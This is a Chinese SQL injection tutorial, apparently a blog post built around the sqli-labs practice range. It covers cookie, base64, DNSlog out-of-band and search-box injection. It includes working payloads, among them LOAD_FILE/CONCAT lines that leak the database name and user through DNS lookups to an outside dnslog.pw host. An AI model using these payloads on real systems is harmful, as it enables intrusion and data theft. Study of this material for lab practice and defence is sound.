SQL注入（cookie、base64、dnslog外带、搜索型注入）

本文所使用的sql注入靶场为sqli-labs-master，靶场资源文件已上传，如有需要请前往主页或以下链接下载

信安必备靶场-sqli-labs-master-用于练习sql注入各种注入类型资源-CSDN文库

COOKIE注入

如何确定一个网站是否存在Cookie注入漏洞。

寻找形如“.php?id=xx”类的带参数的URL。去掉“id=xx”查看页面显示是否正常，如果不正常，说明参数在数据传递中是直接起作用的。如果正常，则说明可能使用cookie作为参数传递。使用burp抓包并构造payload使用常规注入语句进行注入即可。

判断get参数是否生效，尝试删除id参数，再去进行访问，看页面是否正常如果正常的，说明使用了cookie作为参数传递如果不正常，说明id参数是起了直接作用的

尝试在cookie处传参;id=1,注意添加分号，查看页面是否正常，如果跳出id为1的页面，则说明可使用cookie传参

BASE64注入

base64注入与普通注入并无太大区别，只是将普通的注入语句经过了base64加密以绕过WAF（web应用程序防火墙）

DNSLOG注入—注入判断

DNSlog注入的原理：攻击者注册了某个域名，将这个域名绑定到了某个IP的服务器上并设置了泛解析，当受害机器访问这个域名的任何一个子域名时，攻击者的服务器都会收到请求并记录DNS

什么是泛解析？

泛解析也叫“泛域名解析”，是指，利用通配符 * （星号）来做子域名以实现所有的子域名均指向同一IP地址。

例如您的域名是example.com：

做一个*.example.com的次级域名A记录指向111.111.111.111，那么生效后当访问者无论是输入“123.example.com”还是“abc.example.com”抑或者“123.abc.example.com”甚至是任意字符组成的子域名均会指向到111.111.111.111这个IP地址

——————————————————————————————————————————

原文链接：域名管理常见问题：什么是泛解析？（中科三方）_*:泛解析-CSDN博客

UNC路径

UNC路径UNC路径通用命名规则，也称通用命名规范、通用命名约定。什么是UNC路径？UNC路径就是类似\hacker这样的形式的网络路径。它符合\servername\sharename 格式，其中 servername 是服务器名，sharename 是共享资源的名称。目录或文件的 UNC 名称可以包括共享名称下的目录路径，格式为：\servername\sharename\directory\filename。例如hacker计算机的名为gok123的共享文件夹，用UNC表示就是\hacker\gok123。我们熟悉的命令行访问法访问网上邻居，实际上应该称作UNC路径访问法。不过UNC路径也可以这样写//servername/sharename [强烈建议这样写]

一般格式：

//计算机名/共享资源

//IP地址/共享资源

//域名/共享资源

网上邻居

网上邻居是微软系统自带的功能之一，主要是用来访问局域网的其它电脑的

LOAD_FILE函数

要使用此函数的条件（四个）系统、用户、文件大小、值

secure_file_priv=''必须为空文件，这个功能不是默认开启的，需要在mysql配置文件my.ini中加一句secure_file_priv=''

必须位于服务器主机上必须指定完整路径的文件

而且必须有FILE权限。要用到load_file()，通常需要root权限（LOAD_FILE()函数通常需要 FILE 权限，而 FILE 权限通常是分配给 MySQL 的SUPER特权用户，例如 root 用户）

该文件所有字节可读，但文件内容必须小于max_allowed_packet（限制server接受的数据包大小函数，默认1MB）。

目标服务器必须是windows系统

如果该文件不存在或无法读取，因为前面的条件之一不满足，函数返回NULL

查看secure_file_priv状态命令

show global variables like '%secure_file_priv%';

dnglog注入语句

爆当前数据库

select LOAD_FILE(CONCAT("\\\\",DATABASE(),".8gno8bo8.dnslog.pw/xxx"));

用户名：

id=1' and load_file(concat("//",user(),".8gno8bo8.dnslog.pw/aaa")) -- s

搜索型注入—注入判断

1. 搜索 **keywords'** ，如果出错的话，有90%的可能性存在注入；
2. 搜索 **keywords%' and 1=1 and '%'='** （这个语句的功能就相当于普通SQL注入的 **and 1=1** ）看返回情况；
3. 搜索 **keywords%' and 1=2 and '%'='** （这个语句的功能就相当于普通SQL注入的 **and 1=2** ）看返回情况；
4. 根据2和3的返回情况来判断是不是搜索型文本框注入了。

ryan'and 1=1 and '%'='//用于闭合后面的%
ryan'and 1=1 -- s //也可直接注释，但可能某些情况下不可行

如果你看过我先前发布的三篇sql注入文章，那么学到这里你已经接触了绝大部分的sql注入类型，请前往靶场进行实战练习，靶场地址见文章开头，之后我会不断地对sql注入进行更深入地讲解，请关注持续更新（本文内容来自课件，如有版权问题请与我联系）